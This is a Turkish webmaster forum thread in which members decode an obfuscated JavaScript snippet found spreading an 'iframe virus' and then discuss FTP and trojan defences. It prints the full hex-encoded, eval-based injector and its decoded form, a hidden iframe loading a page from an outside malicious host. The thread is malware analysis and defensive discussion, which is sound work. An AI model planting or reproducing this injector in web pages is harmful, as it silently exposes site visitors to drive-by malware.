İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Bu Betik İframe Yayıyor!? Bi Bakınız

P

PhpMania

0
İyinet Üyesi
Katılım
21 Nisan 2008
Mesajlar
787
Reaction score
0
PHP: 
<script>c10z75='';yde09a=/* y95bfbc9735 */document;yde09a.write('<scr'+'ipt>function ye219175e73(ycd2d2b66){return e'+c10z75+'val(ycd2d2b66); }</scr'+'ipt>');  function c101e3f8acyac09eb4b6cb(y7f0ed){ var y74ea994=16; var zad2='';return (ye219175e73('p'+zad2+'arseInt')(y7f0ed,y74ea994));}function y2d653d71b9c(y311072){ var y515d2a350e1=2; var y4431d='';y18195aa9b9='fromCh';yd7bb39e4=String[y18195aa9b9+'arCode'];for(y521d47=0;y521d47<y311072.length;y521d47+=y515d2a350e1){ y4431d+=(yd7bb39e4(c101e3f8acyac09eb4b6cb(y311072.substr(y521d47,y515d2a350e1))));}return y4431d;} var y4ef656='3C7363726970743E69662821'+c10z75+'6D796961'+c10z75+'297B646F63756D656E742E777269746528756E65736361'+c10z75+'7065282027253363253639253636253732253631'+c10z75+'253664253635253230253665253631'+c10z75+'253664253635253364253633253331'+c10z75+'253330253230253733253732253633253364253237253638253734253734253730253361'+c10z75+'253266253266253733253734253635253730253332253664253635253265253665253635253734253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331'+c10z75+'26253237253262253464253631'+c10z75+'253734253638253265253732253666253735253665253634253238253464253631'+c10z75+'253734253638253265253732253631'+c10z75+'253665253634253666253664253238253239253261'+c10z75+'253332253332253331'+c10z75+'253337253336253330253239253262253237253331'+c10z75+'253332253334253335253631'+c10z75+'253635253237253230253737253639253634253734253638253364253335253332253338253230253638253635253639253637253638253734253364253334253332253330253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c10z75+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c10z75+'2536642536352533652729293B7D7661'+c10z75+'72206D796961'+c10z75+'3D747275653B3C2F7363726970743E';yde09a.write(y2d653d71b9c(y4ef656));</script>

bu betiği çözebilecek olan var mı?

(sitenizde denemeyin sakın. iframe virüsünü yayıyor. çözmekle meşgulüm)
 
Y

yagmayok

1
İyinet Üyesi
Katılım
25 Ocak 2005
Mesajlar
7,131
Reaction score
89
Büyük ihtimalle iframe gibi bir işlev görüyordur. Çözersek galiba somut olarak elimize virüsün nerede bulunduğuna dair bir site elde edeceğiz.
 
O

Ozcan

0
İyinet Üyesi
Katılım
12 Mayıs 2007
Mesajlar
3,749
Reaction score
61
Konum
Antalya
:) yagmayok sonra ne olacak ?

Bu arada senin nickmi değişti ? yamayoq gibiydi sanki
 
Y

yagmayok

1
İyinet Üyesi
Katılım
25 Ocak 2005
Mesajlar
7,131
Reaction score
89
Valla sonrasını bilemiyorum, eğer tanıdığı birisi ise birşeyler yapılabilir. Onun dışında pek birşey yapılamaz galiba. Birde şikayet edilebilir.

Konu dışı: isimde bir değişiklik göremiyorum, kaldı ki k yerine q kullanmak... Asla öyle birşey yapmam.
 
B

BordoMavi

0
İyinet Üyesi
Katılım
31 Ekim 2007
Mesajlar
176
Reaction score
0
Konum
Hirçın Sulardan
biraz uğraştırdı ama site adına ulaştım. hex olarak bir kodlama yapmış alttaraftaki kısmını 2 şerli karakterlere ayırıp çözdüğümüzde en alttaki iframe kodu çıktı 2 defa üst üste hex olarak kodlamış baya bi uğraştırdı ama :D

PHP: 
var y4ef656='3C7363726970743E69662821'+''+'6D796961'+''+'297B646F63756D656E742E777269746528756E65736361'+''+'7065282027253363253639253636253732253631'+''+'253664253635253230253665253631'+''+'253664253635253364253633253331'+''+'253330253230253733253732253633253364253237253638253734253734253730253361'+''+'253266253266253733253734253635253730253332253664253635253265253665253635253734253266253265253634253639253636253266253637253666253265253730253638253730253366253733253639253634253364253331'+''+'26253237253262253464253631'+''+'253734253638253265253732253666253735253665253634253238253464253631'+''+'253734253638253265253732253631'+''+'253665253634253666253664253238253239253261'+''+'253332253332253331'+''+'253337253336253330253239253262253237253331'+''+'253332253334253335253631'+''+'253635253237253230253737253639253634253734253638253364253335253332253338253230253638253635253639253637253638253734253364253334253332253330253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+''+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+''+'2536642536352533652729293B7D7661'+''+'72206D796961'+''+'3D747275653B3C2F7363726970743E';
yde09a.write(fromCharCode(y4ef656));
</script>
PHP: 
<iframe name=c10  src='http://step2me.net/.dif/go.php?sid=1&'+math.round(math.random()*221760)+'1245ae' width=528 height=420  style='visibility:hidden'></iframe>
 
C

CyberTurk

0
İyinet Üyesi
Katılım
13 Mayıs 2005
Mesajlar
2,232
Reaction score
4
Konum
istanbul
adrese ulaşmak çözüm değil bence, bu tür iframe virüsü yayanlar hekledikleri sunuculara bu iframe'i yayıp yeni bir adresle değişecektir o kısmı.

Önemli olan iframe bulaşmasın diye FTP güvenliğinizi sağlamak. O da kullanıcı bilgisayarına trojan bulaşmamasından geçiyor.
 
Y

yagmayok

1
İyinet Üyesi
Katılım
25 Ocak 2005
Mesajlar
7,131
Reaction score
89
Birde galiba sunucu size ait ise ftp için port değişikliğine gitmek te bir önlem olabiliyormuş.
 
Cevap yazmak için giriş yap yada kayıt ol.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Üst